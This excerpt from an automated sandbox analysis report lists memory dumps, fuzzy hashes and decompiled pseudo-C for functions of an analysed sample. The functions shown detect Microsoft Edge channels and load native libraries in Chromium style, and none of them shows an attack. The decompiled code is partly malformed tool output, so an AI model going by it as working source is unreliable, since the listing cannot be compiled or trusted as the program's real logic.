Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51f477ecbd8c86e18464dd12c1106ff108f6fe7e53e3396059e243e6e9527724
Instruction ID: 3e4aa2ddb2d8e81c8354a7a9abd9c0855dd406e35942f766b766150b3b172115
Opcode Fuzzy Hash: 51f477ecbd8c86e18464dd12c1106ff108f6fe7e53e3396059e243e6e9527724
Instruction Fuzzy Hash: DD1151D9C2AF7A06E713633B5D42242DA105EF7989550D347FCB439D61F701B5C17210

Uniqueness

Uniqueness Score: -1.00%

Function 0006626D Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d35fea1031711773cf9ca4232a4cd6f839659ec201a35b62fd392b4a4f0e2cbd
Instruction ID: 7b954fd7434b16f392998e7452f15770c1e012c64c0d35b07d88df37a7d881fe
Opcode Fuzzy Hash: d35fea1031711773cf9ca4232a4cd6f839659ec201a35b62fd392b4a4f0e2cbd
Instruction Fuzzy Hash: CB014FDAC24FAA45E313A33D6843282E6109FF7548620E347FCF838E62F70176D46220

Uniqueness

Uniqueness Score: -1.00%

Function 000F84BC Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f641bdd6db4dcf60a8be920819f65976a1a45bf9504c964b602516d73ff98b4e
Instruction ID: d8baa2d89231ebc6ce7545255bc209b0e5fb3ce4022720339fd63f12499a869b
Opcode Fuzzy Hash: f641bdd6db4dcf60a8be920819f65976a1a45bf9504c964b602516d73ff98b4e
Instruction Fuzzy Hash: C8F0A031610238AFCB26CB4CC405AA873A8EB85B10F11805AE602EB551C670EE00D7C8

Uniqueness

Uniqueness Score: -1.00%

Function 000F848B Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75082cc0214d099a74e8e5e3d19de57714db0a2f9c83b61d2e7da2cc707775a5
Instruction ID: 22d5af4c2aa1638ed55aaeb8854bc3c4761825e6dd863bc4ac913ea0325e537c
Opcode Fuzzy Hash: 75082cc0214d099a74e8e5e3d19de57714db0a2f9c83b61d2e7da2cc707775a5
Instruction Fuzzy Hash: 8CE04632911228EBCB15DBC889049DAF2FCEB88B00B154096B611D3612C674EE00D7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00064577 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b478e1f546ce9a5c90263f502841de5ed2815c13aa0d6343b5217c81eca3c23b
Instruction ID: 68143403f8c8125de0a9a42a89ac12f4d397d9eae44bdea0bcdcd6128cdd3508
Opcode Fuzzy Hash: b478e1f546ce9a5c90263f502841de5ed2815c13aa0d6343b5217c81eca3c23b
Instruction Fuzzy Hash: E2E012305183418FC746DF20C190866FBF1EF87311B06E689D4599B566D334EE88CB55

Uniqueness

Uniqueness Score: -1.00%

Function 000EA7C6 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d0666d10a05e89d19fcf63f29b4a68be3e1570c30c133ac300d2f9e1158eff2
Instruction ID: cbd94d7c60163497e93c1f8fc50e1806721fd136d6764661c5e8b92bda5d143f
Opcode Fuzzy Hash: 8d0666d10a05e89d19fcf63f29b4a68be3e1570c30c133ac300d2f9e1158eff2
Instruction Fuzzy Hash: 82C08C382109884ECE29CD108671BF433A4B396782F8444CCC9430BA42DE1EBC82E702

Uniqueness

Uniqueness Score: -1.00%

Function 000C2410 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E000C2410(intOrPtr __ecx, void* __edx, void* __eflags, void* __fp0) {
				signed int _v20;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				void* _t57;
				intOrPtr _t58;
				intOrPtr _t70;
				intOrPtr _t74;
				void* _t79;
				intOrPtr _t80;
				void* _t81;
				intOrPtr _t82;
				void* _t83;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				signed int _t88;
				intOrPtr _t89;
				intOrPtr _t90;
				signed char _t91;
				void* _t98;
				intOrPtr _t105;
				void* _t108;
				char _t110;
				signed int _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t131;

				_t131 = __fp0;
				_t98 = __edx;
				_t89 = __ecx;
				_t87 = __ecx;
				_t53 =  *0x120014; // 0xf049169a
				_v20 = _t53 ^ _t112;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				_t5 = _t89 + 0x18; // 0x134c20
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = _t5;
				_t9 = _t89 + 0x24; // 0x134c2c
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = _t9;
				_t57 = L000F3C30( *0x123d8c, L"MSEdgeCanary");
				_t114 = _t113 + 8;
				if(_t57 == 0) {
					_push(0xa8);
					_t58 = L000DDBBC();
					_t115 = _t114 + 4;
					_t105 = _t58;
					_t90 = _t58;
					_push(0);
					_push(E000C26B0);
					_push(0x1168e0);
					_push("Microsoft.MSEdgeCanary");
				} else {
					_t79 = L000F3C30( *0x123d8c, L"MSEdgeDev");
					_t117 = _t114 + 8;
					if(_t79 == 0) {
						_push(0xa8);
						_t80 = L000DDBBC();
						_t115 = _t117 + 4;
						_t105 = _t80;
						_t90 = _t80;
						_push(0);
						_push(E000C26B0);
						_push(0x116908);
						_push("Microsoft.MSEdgeDev");
					} else {
						_t81 = L000F3C30( *0x123d8c, L"MSEdgeBeta");
						_t118 = _t117 + 8;
						if(_t81 == 0) {
							_push(0xa8);
							_t82 = L000DDBBC();
							_t115 = _t118 + 4;
							_t105 = _t82;
							_t90 = _t82;
							_push(0);
							_push(E000C26B0);
							_push(0x11692c);
							_push("Microsoft.MSEdgeBeta");
						} else {
							_t83 = L000F3C30( *0x123d8c, L"MSEdgeInternal");
							_t119 = _t118 + 8;
							if(_t83 == 0) {
								_push(0xa8);
								_t84 = L000DDBBC();
								_t115 = _t119 + 4;
								_t105 = _t84;
								_t90 = _t84;
								_push(0);
								_push(E000C26B0);
								_push(0x116954);
								_push("Microsoft.MSEdgeInternal");
							} else {
								_t85 = L000F3C30( *0x123d8c, L"MSEdgeWebView");
								_push(0xa8);
								_t86 = L000DDBBC();
								_t115 = _t119 + 0xc;
								_t105 = _t86;
								_t90 = _t86;
								_t126 = _t85;
								if(_t85 == 0) {
									_push(0);
									_push(E000C26B0);
									_push(0x116980);
									_push("Microsoft.MSEdgeWebView");
								} else {
									_push(0);
									_push(E000C26B0);
									_push(0x1169a8);
									_push("Microsoft.MSEdgeStable");
								}
							}
						}
					}
				}
				L000D8F40(_t87, _t90, _t98, _t126, _t131);
				_t109 =  *((intOrPtr*)(_t87 + 0x10));
				 *((intOrPtr*)(_t87 + 0x10)) = _t105;
				if( *((intOrPtr*)(_t87 + 0x10)) != 0) {
					L000D8E70(_t87, _t109, _t131);
					L000DDBEC(_t109);
					_t115 = _t115 + 4;
				}
				_t15 = _t87 + 0x14; // 0x134c1c
				_v56 = _t15;
				_v48 = _t87;
				_t18 = _t87 + 0x20; // 0x134c28
				_v52 = _t18;
				 *0x134bf8 = 1;
				_t88 = 0;
				asm("o16 nop [eax+eax]");
				do {
					_t91 = _t88;
					_t101 =  !=  ? 1 : 0xbadbad << _t91;
					_v60 =  !=  ? 1 : 0xbadbad << _t91;
					_t108 =  !=  ? 0 : 1 << _t91;
					_t110 =  *((intOrPtr*)(0x1169d0 + _t88 * 4));
					_v44 = _t110;
					_v40 = E000F31A0(_t110);
					_v36 =  &_v44;
					_push( &_v32);
					L000C3960(_v56, _t131,  &_v28,  &_v44, 0x116d5f,  &_v36);
					 *((char*)(_v28 + 0x18)) = 0;
					_v44 = _t110;
					_t70 = E000F31A0(_t110);
					_t115 = _t115 + 8;
					_v40 = _t70;
					_v36 =  &_v44;
					_push( &_v32);
					L000C3AA0(_v52, _t131,  &_v28,  &_v44, 0x116d5f,  &_v36);
					_t74 = _v28;
					 *((intOrPtr*)(_t74 + 0x1c)) = _v60;
					 *((intOrPtr*)(_t74 + 0x18)) = 1;
					_t88 = _t88 + 1;
				} while (_t88 != 0x30);
				E000DE643(_t74, _t88, _v20 ^ _t112,  &_v36, _t108, _t110);
				return _v48;
			}

0x000c2410
0x000c2410
0x000c2410
0x000c2419
0x000c241b
0x000c2422
0x000c2425
0x000c242c
0x000c2433
0x000c243a
0x000c243d
0x000c2444
0x000c244b
0x000c244e
0x000c2451
0x000c2458
0x000c245f
0x000c246d
0x000c2472
0x000c2477
0x000c2512
0x000c2517
0x000c251c
0x000c251f
0x000c2521
0x000c2523
0x000c2525
0x000c252a
0x000c252f
0x000c247d
0x000c2488
0x000c248d
0x000c2492
0x000c2536
0x000c253b
0x000c2540
0x000c2543
0x000c2545
0x000c2547
0x000c2549
0x000c254e
0x000c2553
0x000c2498
0x000c24a3
0x000c24a8
0x000c24ad
0x000c255a
0x000c255f
0x000c2564
0x000c2567
0x000c2569
0x000c256b
0x000c256d
0x000c2572
0x000c2577
0x000c24b3
0x000c24be
0x000c24c3
0x000c24c8
0x000c257e
0x000c2583
0x000c2588
0x000c258b
0x000c258d
0x000c258f
0x000c2591
0x000c2596
0x000c259b
0x000c24ce
0x000c24d9
0x000c24e3
0x000c24e8
0x000c24ed
0x000c24f0
0x000c24f2
0x000c24f4
0x000c24f6
0x000c25a2
0x000c25a4
0x000c25a9
0x000c25ae
0x000c24fc
0x000c24fc
0x000c24fe
0x000c2503
0x000c2508
0x000c2508
0x000c24f6
0x000c24c8
0x000c24ad
0x000c2492
0x000c25b3
0x000c25b8
0x000c25bb
0x000c25c0
0x000c25c4
0x000c25ca
0x000c25cf
0x000c25cf
0x000c25d2
0x000c25d5
0x000c25d8
0x000c25db
0x000c25de
0x000c25e1
0x000c25e8
0x000c25ea
0x000c25f0
0x000c25f2
0x000c2606
0x000c2609
0x000c2611
0x000c2614
0x000c261b
0x000c2627
0x000c262d
0x000c2636
0x000c2645
0x000c264d
0x000c2651
0x000c2655
0x000c265a
0x000c265d
0x000c2663
0x000c266c
0x000c267b
0x000c2680
0x000c2686
0x000c2689
0x000c268c
0x000c268d
0x000c269b
0x000c26aa

APIs

_strlen.LIBCMT ref: 000C261F
_strlen.LIBCMT ref: 000C2655

Strings

Microsoft.MSEdgeInternal, xrefs: 000C259B
Microsoft.MSEdgeStable, xrefs: 000C2508
MSEdgeDev, xrefs: 000C247D
Microsoft.MSEdgeDev, xrefs: 000C2553
MSEdgeCanary, xrefs: 000C2462
Microsoft.MSEdgeCanary, xrefs: 000C252F
MSEdgeBeta, xrefs: 000C2498
MSEdgeInternal, xrefs: 000C24B3
Microsoft.MSEdgeWebView, xrefs: 000C25AE
MSEdgeWebView, xrefs: 000C24CE
Microsoft.MSEdgeBeta, xrefs: 000C2577

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: _strlen
String ID: MSEdgeBeta$MSEdgeCanary$MSEdgeDev$MSEdgeInternal$MSEdgeWebView$Microsoft.MSEdgeBeta$Microsoft.MSEdgeCanary$Microsoft.MSEdgeDev$Microsoft.MSEdgeInternal$Microsoft.MSEdgeStable$Microsoft.MSEdgeWebView
API String ID: 4218353326-4251218085
Opcode ID: 6a987a258d926adae595ebd93a994935e8b7eb9937b8763e5e588e9fa98c7d2b
Instruction ID: 2ea199ac53b4bb94a51821845abbcae5f771839bcd54f4649fee80e2665e1747
Opcode Fuzzy Hash: 6a987a258d926adae595ebd93a994935e8b7eb9937b8763e5e588e9fa98c7d2b
Instruction Fuzzy Hash: D86194B1E40308ABDB04DF64DC42FEE76F4AB44714F15403EE905BB282EB729A55CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 000B10C0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 313
libraryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E000B10C0(void* __eax, signed int* __ecx, void* __fp0, void** _a4, signed int _a8) {
				WCHAR* _v0;
				unsigned int _v20;
				signed int _v44;
				signed int _v48;
				char _v116;
				char _v120;
				char _v132;
				char _v136;
				void* _v140;
				signed int _v144;
				char _v148;
				char _v152;
				signed char _v153;
				signed int _v156;
				char _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t76;
				signed int _t79;
				intOrPtr _t85;
				signed int _t88;
				void* _t100;
				signed int _t103;
				signed int _t108;
				WCHAR* _t112;
				signed int _t113;
				signed int _t118;
				signed int _t123;
				signed int _t125;
				unsigned int _t127;
				signed int _t130;
				WCHAR* _t131;
				signed int _t135;
				signed int _t136;
				void* _t138;
				signed int _t141;
				intOrPtr _t142;
				signed int _t160;
				signed int _t162;
				signed int _t169;
				signed int _t171;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int* _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t194;
				signed int* _t195;
				intOrPtr* _t197;
				void* _t211;

				_t211 = __fp0;
				_push(__eax);
				_t180 = __ecx;
				_t76 =  *((intOrPtr*)(__ecx));
				_t175 =  *((intOrPtr*)(__ecx + 4)) - _t76 >> 2;
				_t138 = _t175 + 1;
				if(_t138 >= 0x40000000) {
					L000EE930(_t130, _t138, _t165, _t175, __ecx);
				} else {
					_t165 =  *((intOrPtr*)(__ecx + 8)) - _t76;
					_t123 =  *((intOrPtr*)(__ecx + 8)) - _t76 >> 1;
					_t124 =  <=  ? _t138 : _t123;
					_t130 =  <  ?  <=  ? _t138 : _t123 : 0x3fffffff;
					if(0x3fffffff == 0) {
						_t125 = 0;
						__eflags = 0;
						L5:
						 *(_t125 + _t175 * 4) =  *_a4;
						_t169 = _t125 + _t175 * 4;
						_t160 = _t125 + _t130 * 4;
						 *_a4 = 0;
						_t127 = _t125 + _t175 * 4 + 4;
						_t179 =  *_t180;
						_t135 = _t180[1];
						if(_t135 == _t179) {
							 *_t180 = _t169;
							_t180[1] = _t127;
							_t180[2] = _t160;
							__eflags = _t179;
							if(_t179 != 0) {
								L10:
								return L000DDBEC(_t179);
							}
							L15:
							return _t127;
						}
						_v20 = _t160;
						do {
							 *(_t169 - 4) =  *(_t135 - 4);
							 *(_t135 - 4) = 0;
							_t162 = _t135 - 4;
							_t169 = _t169 + 0xfffffffc;
							_t135 = _t162;
						} while (_t162 != _t179);
						_t179 =  *_t180;
						_t136 = _t180[1];
						 *_t180 = _t169;
						_t180[1] = _t127;
						_t127 = _v20;
						_t180[2] = _t127;
						if(_t136 != _t179) {
							do {
								_t26 = _t136 - 4; // -4
								_t187 = _t26;
								_t127 =  *(_t136 - 4);
								_t171 = _t127 >> 0x13;
								__eflags = _t171;
								asm("bt edx, ecx");
								if(_t171 < 0) {
									_push(_t127);
									_t127 = L0009EA30(_t127, _t211);
									_t190 = _t190 + 4;
								}
								 *(_t136 - 4) = 0;
								_t136 = _t187;
								__eflags = _t187 - _t179;
							} while (_t187 != _t179);
						}
						if(_t179 == 0) {
							goto L15;
						}
						goto L10;
					}
					if(0x3fffffff < 0x40000000) {
						_push(0xfffffffc);
						_t125 = L000DDBBC();
						_t190 = _t190 + 4;
						goto L5;
					}
				}
				L00072E27();
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t189 = _t190;
				_push(_t130);
				_push(_t175);
				_push(_t180);
				_t79 =  *0x120014; // 0xf049169a
				_v44 = _t79 ^ _t189;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x60], xmm0");
				asm("movdqa [esp+0x50], xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x30], xmm0");
				L000A4C80( &_v132, "LoadNativeLibraryHelper", "..\\..\\base\\native_library_win.cc", 0x6b);
				L000A9DD0(_t130,  &_v116, _t165, __eflags, _t211,  &_v132, 0);
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x20], xmm0");
				L000A4C80( &_v156, "LoadNativeLibraryHelper", "..\\..\\base\\native_library_win.cc", 0x71);
				_t194 = (_t190 & 0xfffffff0) - 0x80 + 0x20;
				L000AB520(_t130,  &_v140, _t165, _t211,  &_v156, 0);
				_t85 =  *0x1315a4; // 0x0
				_t141 =  *0x123e38; // 0x0
				_t166 =  *[fs:0x2c];
				_t142 =  *((intOrPtr*)( *[fs:0x2c] + _t141 * 4));
				__eflags = _t85 -  *((intOrPtr*)(_t142 + 4));
				if(_t85 >  *((intOrPtr*)(_t142 + 4))) {
					L000DDC67(_t85, 0x1315a4);
					_t194 = _t194 + 4;
					__eflags =  *0x1315a4 - 0xffffffff;
					if( *0x1315a4 == 0xffffffff) {
						 *0x1315a0 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "AddDllDirectory");
						L000DDCDD(0x1315a4);
						_t194 = _t194 + 4;
					}
				}
				_t131 = _v0;
				_t183 =  *0x1315a0; // 0x0
				__eflags = _t183;
				if(__eflags == 0) {
					L29:
					_v148 = 0xffffffff;
					_v144 = 0xffffffff;
					_v140 = 0xffffffff;
					E0009A7D0( &_v148);
					_t88 = E000A0460(_t166, __eflags, _t211,  &_v148);
					_t195 = _t194 + 4;
					__eflags = _t88;
					 *_t195 = _t183;
					if(_t88 == 0) {
						_t184 = 0;
						__eflags = _t131[5];
						if(_t131[5] < 0) {
							goto L37;
						}
					} else {
						_v160 = 0xffffffff;
						_v156 = 0xffffffff;
						_v152 = 0xffffffff;
						_t178 =  &_v160;
						L0009AF30(_t131, _t166, _t211,  &_v160);
						_t108 = _v153 & 0x000000ff;
						__eflags = _t108;
						if(_t108 < 0) {
							_t108 = _v156;
						}
						__eflags = _t108;
						if(__eflags != 0) {
							E000A0570(__eflags, _t211, _t178);
							_t195 =  &(_t195[1]);
						}
						__eflags = _t108;
						_t184 = _t108 & 0xffffff00 | _t108 != 0x00000000;
						L0009A900(_t108 & 0xffffff00 | _t108 != 0x00000000,  &_v160);
						__eflags = _t131[5];
						if(_t131[5] < 0) {
							L37:
							_t131 =  *_t131;
						} else {
						}
					}
					_t177 = LoadLibraryW(_t131);
					__eflags = _a8;
					if(_a8 != 0) {
						__eflags = _t177;
						if(_t177 == 0) {
							 *_a8 = GetLastError();
						}
					}
					__eflags = _t184;
					if(__eflags != 0) {
						E000A0570(__eflags, _t211,  &_v148);
						_t195 =  &(_t195[1]);
					}
					_t177 =  *_t195;
					 *_t195 = (0 | _t177 == 0x00000000) + (0 |  *_t195 == 0x00000000) * 2 + 1;
					_t185 =  *0x1315a8; // 0x0
					__eflags = _t185;
					if(__eflags == 0) {
						_t197 = _t195 - 0x14;
						asm("movdqa xmm0, [0x1161a0]");
						asm("movdqu [esp+0x4], xmm0");
						 *_t197 = "LibraryLoader.LoadNativeLibraryWindows";
						_t103 = L000BEE30(_t131, _t166, _t177, __eflags, _t211);
						_t195 = _t197 + 0x14;
						_t185 = _t103;
						 *0x1315a8 = _t103;
					}
					_t132 =  *((intOrPtr*)( *_t185 + 0x14));
					 *0x137000();
					L0009A900( *((intOrPtr*)( *((intOrPtr*)( *_t185 + 0x14))))( *_t195),  &_v152);
				} else {
					__eflags = _t131[5];
					_t112 = _t131;
					if(_t131[5] < 0) {
						_t112 =  *_t131;
					}
					_t113 = LoadLibraryExW(_t112, 0, 0x1100);
					__eflags = _t113;
					if(_t113 == 0) {
						__eflags = _a8;
						if(__eflags != 0) {
							 *_a8 = GetLastError();
						}
						goto L29;
					} else {
						_t177 = _t113;
						_t185 =  *0x1315a8; // 0x0
						__eflags = _t185;
						if(__eflags == 0) {
							asm("movdqa xmm0, [0x1161a0]");
							asm("movdqu [esp+0x4], xmm0");
							 *((intOrPtr*)(_t194 - 0x14)) = "LibraryLoader.LoadNativeLibraryWindows";
							_t118 = L000BEE30(_t131, _t166, _t177, __eflags, _t211);
							_t185 = _t118;
							 *0x1315a8 = _t118;
						}
						_t132 =  *((intOrPtr*)( *_t185 + 0x14));
						 *0x137000();
						 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 0x14))))(0);
					}
				}
				E000AB620(_t132,  &_v136, _t177, _t211);
				_t100 = L000A9E30( &_v120, _t166, _t211);
				__eflags = _v48 ^ _t189;
				E000DE643(_t100, _t132, _v48 ^ _t189, _t166, _t177, _t185);
				return _t177;
			}

0x000b10c0
0x000b10c6
0x000b10c7
0x000b10c9
0x000b10d0
0x000b10d3
0x000b10dc
0x000b11da
0x000b10e2
0x000b10e5
0x000b10e9
0x000b10ed
0x000b10fb
0x000b1100
0x000b1120
0x000b1120
0x000b1122
0x000b1127
0x000b112a
0x000b112d
0x000b1133
0x000b113c
0x000b113f
0x000b1141
0x000b1146
0x000b11c4
0x000b11c6
0x000b11c9
0x000b11cc
0x000b11ce
0x000b1181
0x00000000
0x000b1187
0x000b11d0
0x00000000
0x000b11d0
0x000b114c
0x000b1150
0x000b1153
0x000b1156
0x000b115d
0x000b1160
0x000b1163
0x000b1165
0x000b1169
0x000b116b
0x000b116e
0x000b1170
0x000b1173
0x000b1176
0x000b117b
0x000b119d
0x000b119d
0x000b119d
0x000b11a0
0x000b11aa
0x000b11aa
0x000b11b4
0x000b11b7
0x000b11b9
0x000b11ba
0x000b11bf
0x000b11bf
0x000b1190
0x000b1197
0x000b1199
0x000b1199
0x000b119d
0x000b117f
0x00000000
0x00000000
0x00000000
0x000b117f
0x000b1108
0x000b1115
0x000b1116
0x000b111b
0x00000000
0x000b111b
0x000b1108
0x000b11df
0x000b11e4
0x000b11e5
0x000b11e6
0x000b11e7
0x000b11e8
0x000b11e9
0x000b11ea
0x000b11eb
0x000b11ec
0x000b11ed
0x000b11ee
0x000b11ef
0x000b11f1
0x000b11f3
0x000b11f4
0x000b11f5
0x000b11ff
0x000b1206
0x000b120a
0x000b120e
0x000b1214
0x000b121a
0x000b1220
0x000b1237
0x000b1246
0x000b124b
0x000b124f
0x000b1266
0x000b126b
0x000b1275
0x000b127a
0x000b127f
0x000b1285
0x000b128c
0x000b128f
0x000b1295
0x000b1479
0x000b147e
0x000b1481
0x000b1488
0x000b14a5
0x000b14af
0x000b14b4
0x000b14b4
0x000b1488
0x000b129b
0x000b129e
0x000b12a4
0x000b12a6
0x000b1320
0x000b1320
0x000b1328
0x000b1330
0x000b133e
0x000b1344
0x000b1349
0x000b134c
0x000b134e
0x000b1351
0x000b13ad
0x000b13af
0x000b13b3
0x00000000
0x00000000
0x000b1353
0x000b1353
0x000b135b
0x000b1363
0x000b136b
0x000b1372
0x000b1377
0x000b137c
0x000b137e
0x000b1380
0x000b1380
0x000b1384
0x000b1386
0x000b138b
0x000b1392
0x000b1392
0x000b1395
0x000b139a
0x000b13a0
0x000b13a5
0x000b13a9
0x000b13b5
